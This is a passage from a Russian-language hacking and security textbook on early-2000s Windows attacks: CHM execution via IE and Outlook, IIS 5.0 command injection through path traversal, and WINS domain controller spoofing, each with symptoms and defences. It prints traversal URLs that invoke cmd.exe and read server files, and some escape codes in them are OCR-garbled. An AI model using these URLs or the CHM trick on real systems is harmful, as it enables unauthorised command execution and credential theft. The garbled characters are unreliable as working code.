- •Формальные модели шифров
- •Математическая модель шифра замены
- •Шифры, не распространяющие искажений типа «замена знаков»
- •Шифры, не распространяющие искажений типа «пропуск-вставка знаков»
- •Последовательность атаки
- •Переполнение буфера
- •Что такое переполнение буфера
- •Принцип действия
- •Виды переполнения буфера
- •Почему так много уязвимых программ
- •Способ защиты
- •Десять примеров переполнения буфера
- •Что такое netcat?
- •Способ применения
- •Эксплоиты для взлома nt
- •Брешь в безопасности rds службы iis
- •Совместно используемые ресурсы
- •Взлом с помощью относительного пути
- •Захват dsn с использованием утилит odbc Datasource
- •Поглощение ресурсов процессора с использованием mstask.Exe и Microsoft Internet Explorer
- •Запуск программ с помощью ie 5.X или Outlook
- •Запуск команд на Web-сервере с помощью iis 5.0
- •Возможность подмены контроллера домена в wins
- •Методы взлома unix
- •Что такое cgi-программа?
- •Принцип работы
- •Подробное описание
- •Способ применения
- •Симптомы атаки
- •Методы защиты
- •Подробное описание
- •Способ применения
- •Симптомы атаки
- •Методы защиты
- •Версия ос
- •XTest позволяет клиенту переправлять события другому клиенту. Такими событиями могут быть нажатия клавиш. При этом событие через сервер может пересьиаться другому клиенту в
- •Дополнительная информация
- •Люки и троянские кони
- •Подмена системных утилит
- •Подмена на уровне файлов
- •Защита от подмены на файловом уровне
- •Наборы утилит для nt
- •Эксплоит Brown Orifice
- •Программы слияния
- •Сокрытие следов
- •Как скрыть следы
- •Файлы журналов
- •Файлы журналов Linux
- •Взгляд со стороны взломщика
- •Invisible.С — прячет все следы работы взломщика от имени пользователя root в системе.
- •Защита файлов журналов в unix
- •Регулярное проведение резервного копирования
- •Использование одноразовых носителей
- •Кодирование
- •Регулярный просмотр файлов журналов
- •Ведение журналов в nt
- •Взгляд со стороны взломщика
- •Защита файлов журналов в nt
- •Защита от изменений информации о файле
- •Дополнительные файлы
- •Защита от размещения дополнительных файлов
- •Сокрытие следов в сети
- •Общая картина
- •Сценарии взлома
- •Сканеры телефонных линий
- •Другие типы взлома
- •Переполнение буфера в bind 8.2
- •Взлом с помощью cookie
- •Области доступа snmp
- •Анализ сетевых пакетов и dsniff
- •Взлом pgp adk
- •Уязвимость паролей cisco ios
- •1. Получить файлы настройки через snmp
- •Вклинивание в процесс передачи ключа
- •Взлом с нттр-туннелированием
Запуск программ с помощью ie 5.X или Outlook
В программах IE 5.x, Outlook и Outlook Express есть брешь, которая позволяет запуск программ с помощью . chm-файлов. Эта уязвимость позволяет узнать путь к папке временных файлов Internet на компьютере пользователя. Это может привести к тому, что взломщик получит полный контроль над компьютером жертвы.
Строка «OBJECT DATA="http://SOMEHOST.COM/chmtemp.html" TYPE="text/html" WIDTH=200 HEIGHT=200> позволяет узнать путь к папке временных файлов Internet на компьютере жертвы (где SOMEHOST.СОМ является адресом Web-сервера или псевдонимом, который отличается от адреса загруженной страницы). После того как путь к папке временных файлов Internet известен, можно поместить файл . chm в эту папку и запустить его с помощью функции window. showHelp ().
Основным признаком использования данного эксплоита является запуск программ без ведома пользователя.
Для того чтобы надежно защититься от данного метода, нужно перевести IE в режим максимальной защищенности.
Запуск команд на Web-сервере с помощью iis 5.0
Если на IIS 5.0 установлена заплата Q277873, взломщик имеет возможность выполнять на сервере любую команду.
Когда сервер IIS получает запрос на запуск выполняемого файла, этот запрос передается ОС Windows на обработку. Существует возможность создания запроса, при котором вместе с именем файла ОС Windows будет передана команда. После получения запроса IIS передает всю строку операционной системе. В результате после выполнения файла будет также запущена указанная команда.
Для использования данного эксплоита нужно иметь Internet Explorer и приведенный ниже сценарий.
Чтобы засечь такой взлом, нужно постоянно просматривать журналы системы и выявлять необычные действия с жестким диском и приложениями. Таким образом, до того как будут выпущены пакеты обновлений, знание того, что происходит в системе, является необходимым условием безопасности.
Для защита от такого взлома не устанавливайте или удалите заплату Q277873, пока не будет выпущена исправленная версия. Это типичный случай, когда заплата позволяет решить одну проблему, но создает другую. Именно поэтому очень важно проверять заплаты до их использования в производственных условиях.
Ниже приведен URL, с помощью которого взломщик может получить информацию о сервере.
http://SOMEHOST/scripts/georgi.bat/..%С1%9С..%С1%9С..%Cl%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\
В данном случае выполняется команда "DIR С:\", результаты работы которой могут быть сохранены в файле. Для того чтобы прочитать другие файлы, взломщику достаточно ввести URL:
http://SOMEHOST/scripts/georgi.asp/..%C1%9C..%С1%9С..%С!%9Ctest.txt
Возможность подмены контроллера домена в wins
Служба WINS ОС Windows NT не проверяет данные регистрации, полученные от других компьютеров сети. Пользователь, который находится в этой сети, может изменить записи WINS о контроллере домена. Это приведет к тому, что служба WINS будет перенаправлять запросы к контроллеру домена другой системе. Эта другая система не сможет корректно производить аутентификацию пользователей, но взломщик сможет узнать имена и пароли пользователей, которые попытаются обратиться к контроллеру домена. Компьютер взломщика сможет имитировать процесс подключения и получить имена пользователей и пароли. Если пароли были закодированы с помощью Lanman (а не NTLM), их можно быстро взломать с помощью программы LOphtCrack.
Симптомы атаки: IP-адрес контроллера домена неправильный и пользователи не могут подключиться к домену. Программы анализа пакетов (сниферы) могут подтвердить ваши предположения.
Как защититься? Во-первых, в службе WINS стоит статически определить адреса важных серверов, в том числе и контроллера домена. Компания Microsoft утверждает, что поскольку WINS использует NetBIOS, который является незащищенным протоколом, то нет возможности защититься от такого взлома. Для безопасной связи следует пользоваться Active Directory, Kerberos и DNS. Если в точке подключения к Internet пакеты NetBIOS не блокируются, то взлом может быть проведен удаленно. Кроме того, этот тип взлома возможен с использованием модемного подключения.